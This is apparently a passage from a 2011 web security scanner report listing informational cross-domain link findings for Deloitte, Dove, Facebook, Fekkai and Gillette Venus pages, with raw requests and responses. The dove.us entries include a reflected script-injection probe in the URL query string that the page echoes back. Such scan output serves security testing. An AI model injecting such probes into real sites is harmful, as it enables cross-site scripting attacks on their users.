...[SNIP]...
<script defer="defer" type="text/javascript" src="https://ips-invite.iperceptions.com/webValidator.aspx?sdfc=225de72b-25001-dc122be4-e6ff-4f0b-866a-51f79b5e757f&lID=1&loc=4Q-WEB2&cD=90&rF=False&iType=1&domainname=0"></script>
...[SNIP]...
</script> <script src="//secure.quantserve.com/quant.js" type="text/javascript"></script> <noscript><img src="//secure.quantserve.com/pixel/p-33Ko2HMIENRZ2.gif" style="display: none;" border="0" height="1" width="1" alt="Quantcast"/> </noscript>
...[SNIP]...
<div id="subTools">

           <a href='http://www.addthis.com/bookmark.php' onmouseover="var flag2 = loadScript('http://s7.addthis.com/js/250/addthis_widget.js'); if(flag2 == true){return addthis_open(this, '', '[URL]', '[TITLE]');}" onclick=" if(flag2 == true){return addthis_sendto();}" >
               <img src="/deloitte-ecm-cm-dpm-web/images/dcom/i_tool_social.gif" alt='Bookmark' title='Bookmark' />
...[SNIP]...
<noscript>


       <img src="http://deloitte.122.2o7.net/b/ss/deloittecomnewplatformprod/1/H.2-pdv-2/266170682?...c1=us&v3=en&c2=en&c3=us;en&c5=/view/en_us/us/search/index.htm&c25=/view/en_us/us/search/index.htm&ch=home%20page&h1=view#en_us#us#search#index.htm?searchbtn.y=0&searchkeywordsfield=broadbacd%20ip%20cable&searchbtn.x=0&searchkeywordsfielddefault=search&c11=0&c34=home&c35=channel&c14=31f8ad0eea0d6110VgnVCM100000ba42f00aRCRD&nullc7=broadbacd%20ip%20cable&" width="1" height="1" border="0" />
   </noscript>
...[SNIP]...

19.87. http://www.deloitte.com/view/en_US/us/search/index.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.deloitte.com
Path:	/view/en_US/us/search/index.htm

Issue detail

The page was loaded from a URL containing a query string:

http://www.deloitte.com/view/en_US/us/search/index.htm?searchKeywordsField=Dbriefs&searchKeywordsFieldDefault=Search

The response contains the following links to other domains:

http://deloitte.122.2o7.net/b/ss/deloittecomnewplatformprod/1/H.2-pdv-2/-1319978553?...c1=us&v3=en&c2=en&c3=us;en&c5=/view/en_us/us/search/index.htm&c25=/view/en_us/us/search/index.htm&ch=home%20page&h1=view
http://secure.quantserve.com/pixel/p-33Ko2HMIENRZ2.gif
http://secure.quantserve.com/quant.js
http://www.addthis.com/bookmark.php
https://er0.deloitteonline.com/dol/login.aspx
https://ips-invite.iperceptions.com/webValidator.aspx?sdfc=225de72b-25001-dc122be4-e6ff-4f0b-866a-51f79b5e757f&lID=1&loc=4Q-WEB2&cD=90&rF=False&iType=1&domainname=0

Request

GET /view/en_US/us/search/index.htm?searchKeywordsField=Dbriefs&searchKeywordsFieldDefault=Search HTTP/1.1
Host: www.deloitte.com
Proxy-Connection: keep-alive
Referer: http://www.deloitte.com/view/en_US/us/index.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-928200600-1315342618637; s_vnum=1747342618651%26vn%3D1; s_vi=[CS]v1|27332165051D18B6-4000013520016CC4[CE]; BIGipServerwww64.deloitte.com=50851850.36895.0000; JSESSIONID=TXZLTmHhpV39Bfbyvx40TblHPS1M1Jn7hpPL9l4NkhxHQzhRSMmw!-755750050; __utma=55230644.1519156675.1315342619.1315342619.1315342619.1; __utmb=55230644.4.10.1315342619; __utmc=55230644; __utmz=55230644.1315342619.1.1.utmcsr=oracle.com|utmccn=(referral)|utmcmd=referral|utmcct=/openworld/tools/mobile/index.html; s_cc=true; s_ppv=100; SC_LINKS=us%5E%5EDbriefs%5E%5Eus%20%7C%20Dbriefs%5E%5E; s_nr=1315343832177-New; s_invisit=true; s_ppg=us; s_sq=deloittecomnewplatformprod%3D%2526pid%253Dus%2526pidt%253D1%2526oid%253Djavascript%25253AsubmitSearchOverlay('Dbriefs')%25253B_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Cache-Control: no-cache
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
Content-Length: 76178
Date: Tue, 06 Sep 2011 16:17:13 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link href="/vgn-ext-templating/common/styles/
...[SNIP]...
<li
>
<a href="https://er0.deloitteonline.com/dol/login.aspx"target='_blank'>Clients</a>
...[SNIP]...
<script defer="defer" type="text/javascript" src="https://ips-invite.iperceptions.com/webValidator.aspx?sdfc=225de72b-25001-dc122be4-e6ff-4f0b-866a-51f79b5e757f&lID=1&loc=4Q-WEB2&cD=90&rF=False&iType=1&domainname=0"></script>
...[SNIP]...
</script> <script src="//secure.quantserve.com/quant.js" type="text/javascript"></script> <noscript><img src="//secure.quantserve.com/pixel/p-33Ko2HMIENRZ2.gif" style="display: none;" border="0" height="1" width="1" alt="Quantcast"/> </noscript>
...[SNIP]...
<div id="subTools">

           <a href='http://www.addthis.com/bookmark.php' onmouseover="var flag2 = loadScript('http://s7.addthis.com/js/250/addthis_widget.js'); if(flag2 == true){return addthis_open(this, '', '[URL]', '[TITLE]');}" onclick=" if(flag2 == true){return addthis_sendto();}" >
               <img src="/deloitte-ecm-cm-dpm-web/images/dcom/i_tool_social.gif" alt='Bookmark' title='Bookmark' />
...[SNIP]...
<noscript>


       <img src="http://deloitte.122.2o7.net/b/ss/deloittecomnewplatformprod/1/H.2-pdv-2/-1319978553?...c1=us&v3=en&c2=en&c3=us;en&c5=/view/en_us/us/search/index.htm&c25=/view/en_us/us/search/index.htm&ch=home%20page&h1=view#en_us#us#search#index.htm?searchkeywordsfielddefault=search&searchkeywordsfield=dbriefs&c11=581&c34=home&c35=channel&c14=31f8ad0eea0d6110VgnVCM100000ba42f00aRCRD&nullc7=dbriefs&" width="1" height="1" border="0" />
   </noscript>
...[SNIP]...

19.88. http://www.deloitte.com/view/en_US/us/search/index.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.deloitte.com
Path:	/view/en_US/us/search/index.htm

Issue detail

The page was loaded from a URL containing a query string:

http://www.deloitte.com/view/en_US/us/search/index.htm?&c=&d=0&sw=0&l=-1&pi=1&q=broadband&st=&sl=&s=0&ct=0&et=0&ec=1&m=0&ps=0&type=0

The response contains the following links to other domains:

http://deloitte.122.2o7.net/b/ss/deloittecomnewplatformprod/1/H.2-pdv-2/-407970229?...c1=us&v3=en&c2=en&c3=us;en&c5=/view/en_us/us/search/index.htm&c25=/view/en_us/us/search/index.htm&ch=home%20page&h1=view
http://secure.quantserve.com/pixel/p-33Ko2HMIENRZ2.gif
http://secure.quantserve.com/quant.js
http://www.addthis.com/bookmark.php
https://er0.deloitteonline.com/dol/login.aspx
https://ips-invite.iperceptions.com/webValidator.aspx?sdfc=225de72b-25001-dc122be4-e6ff-4f0b-866a-51f79b5e757f&lID=1&loc=4Q-WEB2&cD=90&rF=False&iType=1&domainname=0

Request

GET /view/en_US/us/search/index.htm?&c=&d=0&sw=0&l=-1&pi=1&q=broadband&st=&sl=&s=0&ct=0&et=0&ec=1&m=0&ps=0&type=0 HTTP/1.1
Host: www.deloitte.com
Proxy-Connection: keep-alive
Referer: http://www.deloitte.com/view/en_US/us/search/index.htm?searchKeywordsField=broadbacd+ip+cable&searchKeywordsFieldDefault=Search&searchBtn.x=0&searchBtn.y=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-928200600-1315342618637; s_vi=[CS]v1|27332165051D18B6-4000013520016CC4[CE]; BIGipServerwww64.deloitte.com=50851850.36895.0000; s_vnum=1747342618651%26vn%3D2; JSESSIONID=WGW1TmPf5K1hhvSxmVygzvtch6pn6HsRCtV116TYKr7FcvQTJkvN!-755750050; SITESERVER=ID=0120f21d112bdebcef542549eb84e28a; __utma=55230644.1519156675.1315342619.1315342619.1315345938.2; __utmb=55230644.10.10.1315345938; __utmc=55230644; __utmz=55230644.1315345938.2.2.utmcsr=oracle.com|utmccn=(referral)|utmcmd=referral|utmcct=/openworld/tools/mobile/index.html; s_cc=true; s_ppv=100; SC_LINKS=us%3Asearch%5E%5Ebroadband%5E%5Eus%3Asearch%20%7C%20broadband%5E%5E; s_nr=1315345962549-Repeat; s_invisit=true; s_ppg=us%3Asearch; s_sq=deloittecomnewplatformprod%3D%2526pid%253Dus%25253Asearch%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.deloitte.com%25252Fview%25252Fen_US%25252Fus%25252Fsearch%25252Findex.htm%25253F%252526c%25253D%252526d%25253D0%252526sw%25253D0%252526l%25253D-1%252526pi%25253D1%252526q%25253Dbroadband%252526st%25253D%252526sl%25253D_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Cache-Control: no-cache
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 16:52:43 GMT
Content-Length: 76933
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link href="/vgn-ext-templating/common/styles/
...[SNIP]...
<li
>
<a href="https://er0.deloitteonline.com/dol/login.aspx"target='_blank'>Clients</a>
...[SNIP]...
<script defer="defer" type="text/javascript" src="https://ips-invite.iperceptions.com/webValidator.aspx?sdfc=225de72b-25001-dc122be4-e6ff-4f0b-866a-51f79b5e757f&lID=1&loc=4Q-WEB2&cD=90&rF=False&iType=1&domainname=0"></script>
...[SNIP]...
</script> <script src="//secure.quantserve.com/quant.js" type="text/javascript"></script> <noscript><img src="//secure.quantserve.com/pixel/p-33Ko2HMIENRZ2.gif" style="display: none;" border="0" height="1" width="1" alt="Quantcast"/> </noscript>
...[SNIP]...
<div id="subTools">

           <a href='http://www.addthis.com/bookmark.php' onmouseover="var flag2 = loadScript('http://s7.addthis.com/js/250/addthis_widget.js'); if(flag2 == true){return addthis_open(this, '', '[URL]', '[TITLE]');}" onclick=" if(flag2 == true){return addthis_sendto();}" >
               <img src="/deloitte-ecm-cm-dpm-web/images/dcom/i_tool_social.gif" alt='Bookmark' title='Bookmark' />
...[SNIP]...
<noscript>


       <img src="http://deloitte.122.2o7.net/b/ss/deloittecomnewplatformprod/1/H.2-pdv-2/-407970229?...c1=us&v3=en&c2=en&c3=us;en&c5=/view/en_us/us/search/index.htm&c25=/view/en_us/us/search/index.htm&ch=home%20page&h1=view#en_us#us#search#index.htm?pi=1&ec=1&sw=0&type=0&sl=&ct=0&s=0&q=broadband&et=0&m=0&l=-1&ps=0&d=0&c=&st=&c11=34&c34=home&c35=channel&c14=31f8ad0eea0d6110VgnVCM100000ba42f00aRCRD&nullc7=broadband&" width="1" height="1" border="0" />
   </noscript>
...[SNIP]...

19.89. http://www.dove.us/Products/Hair/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.dove.us
Path:	/Products/Hair/

Issue detail

The page was loaded from a URL containing a query string:

http://www.dove.us/Products/Hair/?ba088%22%3E%3Cscript%3Eprompt(%22E-Mail?%22)%3C/script%3Ed91bc007f7=1

The response contains the following links to other domains:

http://content.dove.us/utilities/disclaimer/
http://s7.addthis.com/js/250/addthis_widget.js
http://twitter.com/
http://www.facebook.com/dove
http://www.facebook.com/plugins/activity.php?site=http://www.dove.us/Products/Hair/default.aspx?ba088%22%3E%3Cscript%3Eprompt(%22E-Mail?%22)%3C/script%3Ed91bc007f7=1&width=320&height=236&header=false&colorscheme=light&font=arial&border_color=%23ffffff&recommendations=true
http://www.facebook.com/plugins/like.php?app_id=165670856825683&href=http://www.dove.us/Products/Hair/default.aspx?ba088%22%3E%3Cscript%3Eprompt(%22E-Mail?%22)%3C/script%3Ed91bc007f7=1&
send=false&layout=button_count&width=140&show_faces=true&action=recommend&colorscheme=light&font=arial&
height=21
http://www.unilever.com/
http://www.unileverus.com/terms/termsofuse.html
https://secure.unileverus.com/privacy/policy.html?site=www.dove.com

Request

GET /Products/Hair/?ba088%22%3E%3Cscript%3Eprompt(%22E-Mail?%22)%3C/script%3Ed91bc007f7=1 HTTP/1.1
Host: www.dove.us
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.dove.us/Products/Hair/?ba088%22%3E%3Cscript%3Eprompt(%22E-Mail?%22)%3C/script%3Ed91bc007f7=1
Cookie: ASP.NET_SessionId=p00w4n55ylvqfa45ehz13x45

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 29613
Date: Tue, 06 Sep 2011 16:53:39 GMT
Connection: close

<!doctype html>


<iframe src="http://www.facebook.com/plugins/like.php?app_id=165670856825683&href=http://www.dove.us/Products/Hair/default.aspx?ba088%22%3E%3Cscript%3Eprompt(%22E-Mail?%22)%3C/script%3Ed91bc007f7=1&
send=false&layout=button_count&width=140&show_faces=true&action=recommend&colorscheme=light&font=arial&
height=21" title="Recommend" scrolling="no" frameborder="0" style="border: none; float: right;
overflow: hidden; width: 140px; height: 21px;" allowtransparency="true"></iframe>
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#pubid=ra-4dbe77462edfeaf6">
</script>
...[SNIP]...
</h2>

<iframe src="http://www.facebook.com/plugins/activity.php?site=http://www.dove.us/Products/Hair/default.aspx?ba088%22%3E%3Cscript%3Eprompt(%22E-Mail?%22)%3C/script%3Ed91bc007f7=1&width=320&height=236&header=false&colorscheme=light&font=arial&border_color=%23ffffff&recommendations=true"
scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:320px; height:236px;" allowTransparency="true"></iframe>
...[SNIP]...
<li><a title="Unilever Logo" href="http://www.unilever.com" target="_blank"><img alt="Unilever Logo" src="/Resources/Images/style/footer-unilever-logo.png">
...[SNIP]...
<li><a title="Privacy Policy" href="https://secure.unileverus.com/privacy/policy.html?site=www.dove.com" target="_blank">Privacy Policy</a>
...[SNIP]...
<li><a title="Terms of Use" href="http://www.unileverus.com/terms/termsofuse.html" target="_blank">Terms of Use</a>
...[SNIP]...
<li><a title="Disclaimer" href="http://content.dove.us/utilities/disclaimer/" target="_blank">Disclaimer</a>
...[SNIP]...

19.90. http://www.facebook.com/plugins/activity.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/activity.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.facebook.com/plugins/activity.php?site=http://www.dove.us/Products/Hair/default.aspx&width=320&height=236&header=false&colorscheme=light&font=arial&border_color=%23ffffff&recommendations=true

The response contains the following links to other domains:

http://static.ak.fbcdn.net/rsrc.php/v1/yE/r/te2emPSgfVn.css
http://static.ak.fbcdn.net/rsrc.php/v1/ya/r/0V1g9eV4kVC.css
http://static.ak.fbcdn.net/rsrc.php/v1/ya/r/HR2ezcCYeTR.css
http://static.ak.fbcdn.net/rsrc.php/v1/yo/r/VOkpxDXgCrn.css
http://static.ak.fbcdn.net/rsrc.php/v1/yq/r/346Pl_u5ziA.js
http://static.ak.fbcdn.net/rsrc.php/v1/yx/r/xxErGdwd-7F.css
http://static.ak.fbcdn.net/rsrc.php/yi/r/q9U99v3_saj.ico

Request

GET /plugins/activity.php?site=http://www.dove.us/Products/Hair/default.aspx&width=320&height=236&header=false&colorscheme=light&font=arial&border_color=%23ffffff&recommendations=true HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.dove.us/Products/Hair/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

19.91. http://www.facebook.com/plugins/activity.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/activity.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.facebook.com/plugins/activity.php?site=http://www.dove.us/Products/Hair/default.aspx?ba088

The response contains the following links to other domains:

http://static.ak.fbcdn.net/rsrc.php/v1/y-/r/PFoOGI8L4YA.css
http://static.ak.fbcdn.net/rsrc.php/v1/y3/r/0ITpgsiVMtK.css
http://static.ak.fbcdn.net/rsrc.php/v1/yB/r/Sqr_RMyBDQm.css
http://static.ak.fbcdn.net/rsrc.php/v1/yH/r/ZxQqLwC16Cg.css
http://static.ak.fbcdn.net/rsrc.php/v1/yo/r/VOkpxDXgCrn.css
http://static.ak.fbcdn.net/rsrc.php/v1/yq/r/346Pl_u5ziA.js
http://static.ak.fbcdn.net/rsrc.php/yi/r/q9U99v3_saj.ico

Request

GET /plugins/activity.php?site=http://www.dove.us/Products/Hair/default.aspx?ba088 HTTP/1.1
Host: www.facebook.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.dove.us/Products/Hair/?ba088%22%3E%3Cscript%3Eprompt(%22E-Mail?%22)%3C/script%3Ed91bc007f7=1
Cookie: datr=wBc3TiBHvRZVzlo1IH6EEoST; lu=SAa1VWe96iHwXaDAVSJQxUsw

Response

19.92. http://www.fekkai.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.fekkai.com
Path:	/

Issue detail

The page was loaded from a URL containing a query string:

http://www.fekkai.com/?gclid=COTMo_SIiasCFQ6AgwodqEol4A

The response contains the following links to other domains:

http://action.mathtag.com/cnt?id=10384
http://js.revsci.net/gateway/gw.js?csid=F09828
http://www.bbbonline.org/cks.asp?id=292000103
http://www.facebook.com/Fekkai?ref=search&sid=23324090.1887069802..1
http://www.neimanmarcus.com/store/info/index.jhtml?navid=stores_footer
http://www.pg.com/privacy/english/privacy_notice.html
http://www.pg.com/privacy/optsengine/opts_engine_std_brandopts.jhtml?brand=Fekkai
http://www.pg.com/terms.htm

Request

GET /?gclid=COTMo_SIiasCFQ6AgwodqEol4A HTTP/1.1
Host: www.fekkai.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=Direct+Beauty+Product
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:45:37 GMT
Server: Apache
Set-Cookie: fekkai_flash_intro_cookie=True; expires=Wed, 05-Sep-2012 16:45:37 GMT
Vary: User-Agent,Accept-Encoding
Content-Length: 16218
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
...[SNIP]...
</script>

<script src="http://js.revsci.net/gateway/gw.js?csid=F09828"></script>
...[SNIP]...
</p>
<a href="http://www.neimanmarcus.com/store/info/index.jhtml?navid=stores_footer" target="_blank" class="more">Find a Neiman Marcus Store</a>
...[SNIP]...

<script type="text/javascript" src="http://action.mathtag.com/cnt?id=10384"></script>
...[SNIP]...
<li><a class="facebook" href="http://www.facebook.com/Fekkai?ref=search&sid=23324090.1887069802..1" target="_blank">BECOME A FAN</a>
...[SNIP]...
</ul>
<a href="http://www.bbbonline.org/cks.asp?id=292000103" target="_blank"><img src="/images/ico-by.gif" alt="ico-bbb" class="by" width="31" height="50" />
...[SNIP]...
<li><a href="http://www.pg.com/terms.htm" target="_blank">TERMS & CONDITIONS</a>
...[SNIP]...
<li><a href="http://www.pg.com/privacy/english/privacy_notice.html" target="_blank">SECURITY & PRIVACY</a>
...[SNIP]...
<li><a href="http://www.pg.com/privacy/optsengine/opts_engine_std_brandopts.jhtml?brand=Fekkai" target="_blank">UNSUBSCRIBE</a>
...[SNIP]...

19.93. http://www.gillettevenus.com/en_US/buy_it_now/product_links.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.gillettevenus.com
Path:	/en_US/buy_it_now/product_links.jsp

Issue detail

The page was loaded from a URL containing a query string:

http://www.gillettevenus.com/en_US/buy_it_now/product_links.jsp?upc=047400098978

The response contains the following links to other domains:

http://content.channelintelligence.com/scripts/cii_embeddedfunctions.asp
http://content.channelintelligence.com/scripts/ykb_PopupWindow.js
http://js.revsci.net/gateway/gw.js?csid=F09828

Request

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:45:34 GMT
Set-Cookie: preferredLocale=en_US; Expires=Sun, 04-Sep-2016 16:45:34 GMT; Path=/
Content-Type: text/html;charset=ISO-8859-1
Connection: close
Content-Length: 1552

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<h
...[SNIP]...
</script>
<script language="JavaScript" src="http://content.channelintelligence.com/scripts/ykb_PopupWindow.js" type="text/javascript"></script>
<script language="JavaScript" src="http://content.channelintelligence.com/scripts/cii_embeddedfunctions.asp" type="text/javascript"></script>
...[SNIP]...
</table>

<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=F09828"></script>
...[SNIP]...

19.94. http://www.gillettevenus.com/en_US/products/refillables/embrace_purple/index.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.gillettevenus.com
Path:	/en_US/products/refillables/embrace_purple/index.jsp

Issue detail

The page was loaded from a URL containing a query string:

http://www.gillettevenus.com/en_US/products/refillables/embrace_purple/index.jsp?utm_source=google&utm_medium=cpc&utm_term=beauty%20product&utm_campaign=Gillette.Venus_Search_Category+Interest_03.2010|Bath+%26+Beauty&utm_content=sgaAjGa2X|pcrid|6694000949

The response contains the following links to other domains:

http://4qinvite.4q.iperceptions.com/1.aspx?sdfc=5d51d3d2-6966-5953a36f-b8ea-4cdb-ae01-f6ff6bdd8cea&lID=1&loc=4q-web2
http://get.adobe.com/flashplayer/
http://js.revsci.net/gateway/gw.js?csid=F09828
http://www.facebook.com/gillettevenus
http://www.pg.com/privacy/english/privacy_notice.html
http://www.pg.com/privacy/optsengine/opts_engine_std_brandopts.jhtml?brand=venus
http://www.pg.com/terms.htm
http://www.twitter.com/gillettevenus

Request

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:45:32 GMT
Set-Cookie: preferredLocale=en_US; Expires=Sun, 04-Sep-2016 16:45:32 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Connection: close
Content-Length: 81708

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xm
...[SNIP]...
<div id="quicknav">
<a href="http://www.facebook.com/gillettevenus" title="Facebook" target="_blank" ><img src="/en_US/images/facebook.png" alt="Facebook Image" >
...[SNIP]...
</span>

<a href="http://www.twitter.com/gillettevenus" target="_blank" title="Twitter" ><img src="/en_US/images/twitter.png" alt="Twitter" >
...[SNIP]...
<div class="flashBlockAltContent">
<a title="5 blades for a dramatically smooth shave" target="_blank" href="http://get.adobe.com/flashplayer/"><img src="/en_US/products/refillables/embrace_purple/images/FlashDetect_RazorHotspot.jpg" alt="5 blades for a dramatically smooth shave" />
...[SNIP]...
<div class="flashBlockAltContent">
<a title="Get Flash!" target="_blank" href="http://get.adobe.com/flashplayer/"><img src="/en_US/products/refillables/embrace/images/FlashDetect_RazorHotspot.jpg" alt="Get Flash!" />
...[SNIP]...
<div class="flashBlockAltContent">
<a title="Get Flash!" target="_blank" href="http://get.adobe.com/flashplayer/"><img src="/en_US/products/refillables/embrace_purple/images/FlashDetect_RazorHotspot.jpg" alt="Get Flash!" />
...[SNIP]...
<div class="flashBlockAltContent">
<a title="Get Flash!" target="_blank" href="http://get.adobe.com/flashplayer/"><img src="/en_US/products/zoom/FlashDetect_RazorHotspot.jpg" alt="Get Flash!" />
...[SNIP]...
<p class="notice"><a target="_blank" href="http://www.pg.com/privacy/english/privacy_notice.html">Privacy Policy</a>
...[SNIP]...
<li><a href="http://www.pg.com/terms.htm" target="_blank" class="">

Terms & Conditions</a>
...[SNIP]...
<li><a href="http://www.pg.com/privacy/english/privacy_notice.html" target="_blank" class="">

Privacy Statement</a>
...[SNIP]...
<li><a href="http://www.pg.com/privacy/optsengine/opts_engine_std_brandopts.jhtml?brand=venus" target="_blank" class="">

Unsubscribe</a>
...[SNIP]...


<script src="http://4qinvite.4q.iperceptions.com/1.aspx?sdfc=5d51d3d2-6966-5953a36f-b8ea-4cdb-ae01-f6ff6bdd8cea&lID=1&loc=4q-web2" type="text/javascript" defer="defer" ></script>
...[SNIP]...
</div>
<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=F09828"></script>
...[SNIP]...

19.95. http://www.gillettevenus.com/en_US/search/index.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.gillettevenus.com
Path:	/en_US/search/index.jsp

Issue detail

The page was loaded from a URL containing a query string:

http://www.gillettevenus.com/en_US/search/index.jsp?q=razorphonehelpfaq

The response contains the following links to other domains:

http://4qinvite.4q.iperceptions.com/1.aspx?sdfc=5d51d3d2-6966-5953a36f-b8ea-4cdb-ae01-f6ff6bdd8cea&lID=1&loc=4q-web2
http://js.revsci.net/gateway/gw.js?csid=F09828
http://www.facebook.com/gillettevenus
http://www.pg.com/privacy/english/privacy_notice.html
http://www.pg.com/privacy/optsengine/opts_engine_std_brandopts.jhtml?brand=venus
http://www.pg.com/terms.htm
http://www.twitter.com/gillettevenus

Request

GET /en_US/search/index.jsp?q=razorphonehelpfaq HTTP/1.1
Host: www.gillettevenus.com
Proxy-Connection: keep-alive
Referer: http://www.gillettevenus.com/en_US/razor_finder/index.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=82AE08060FF783B0B7073A67819E2C23.el61; IPE_S_7929=7929; bvgacefRatingsAndReviews=true; __utmx=193945275.; __utmxx=193945275.; IPE_S_7929=7929; __utma=193945275.1261590129.1315345534.1315345534.1315345534.1; __utmb=193945275.5.9.1315345534; __utmc=193945275; __utmz=193945275.1315345534.1.1.utmcsr=google|utmccn=Gillette.Venus_Search_Category%20Interest_03.2010|Bath%20&%20Beauty|utmcmd=cpc|utmctr=beauty%20product|utmcct=sgaAjGa2X|pcrid|6694000949; preferredLocale=en_US

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:46:34 GMT
Set-Cookie: preferredLocale=en_US; Expires=Sun, 04-Sep-2016 16:46:34 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Connection: close
Content-Length: 13622

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<hea
...[SNIP]...
<div id="quicknav">
<a href="http://www.facebook.com/gillettevenus" title="Facebook" target="_blank" ><img src="/en_US/images/facebook.png" alt="Facebook Image" >
...[SNIP]...
</span>

<a href="http://www.twitter.com/gillettevenus" target="_blank" title="Twitter" ><img src="/en_US/images/twitter.png" alt="Twitter" >
...[SNIP]...
